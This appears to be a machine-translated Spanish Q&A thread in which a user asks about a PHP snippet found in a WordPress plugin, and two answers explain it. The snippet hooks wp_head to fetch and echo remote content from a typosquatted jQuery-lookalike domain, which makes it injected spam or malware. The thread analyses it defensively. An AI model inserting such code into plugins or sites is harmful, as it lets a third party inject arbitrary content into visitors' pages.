Encontré esto en un complemento. ¿Qué hace? ¿Es peligroso?

Navega tus respuestas
16

Encontré esto en un complemento. ¿Qué hace? es peligroso? 

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}
    
pregunta Sofia Rose 01.08.2013 - 01:16

2 respuestas

16

Carga un bloque de marcado que contiene spam (pensé en publicar un poco de la fuente pero no quiero anunciar el contenido de ninguna manera) desde un dominio que es un error de ortografía cercano del dominio: http://jquery.com/ : utilizado por jQuery, una biblioteca de Javascript reconocida y popular y que WordPress incluye en el Core. Creo que la idea es aparentar estar cargando esa biblioteca, cuando en realidad está cargando algo muy diferente.

Y es de otra manera intentar aparentar estar cargando jQuery. Observe el nombre de la variable $jquery .

También puede intentar cargar scripts maliciosos. No lo comprobé. Definitivamente, lo llamaría peligroso, especialmente porque el contenido de esa página puede cambiar en cualquier momento que los controladores de dominio lo consideren.

En el mejor de los casos, dañará tu sitio a medida que los motores de búsqueda miren hacia abajo en los sitios que propagan el spam.

No lo uses. No hace nada beneficioso para usted o para cualquier otra persona en la web que no sean las personas que administran el sitio. Si encontró esto en un sitio de buena reputación, infórmeselo a ellos.

    
respondido por el s_ha_dum 01.08.2013 - 01:31
7

Sí, es un código peligroso, cargar contenido desde un sitio de spam.

No nombraste el complemento, pero si encontraste este código después de que se instaló en tu sitio web, es posible que el código del complemento no provenga del desarrollador de esta manera, sino que fue hackeado después de que fuera instalado. Si este es el caso, es posible que encuentre el código malicioso en más de su sitio web que solo este complemento.

Verifique el código del complemento descargado desde donde lo obtuvo originalmente, y vea si este código malicioso estuvo allí originalmente. Si no, entonces su sitio ha sido hackeado. Si determina que ese es el caso, lea este artículo del Códice .

    
respondido por el Ben Miller 01.08.2013 - 02:43

Lea otras preguntas en las etiquetas

¿Dónde puedo aprender a crear mi propio tema? Si cambio el nombre de un complemento (en su archivo php principal), ¿todavía recibo notificaciones de actualización?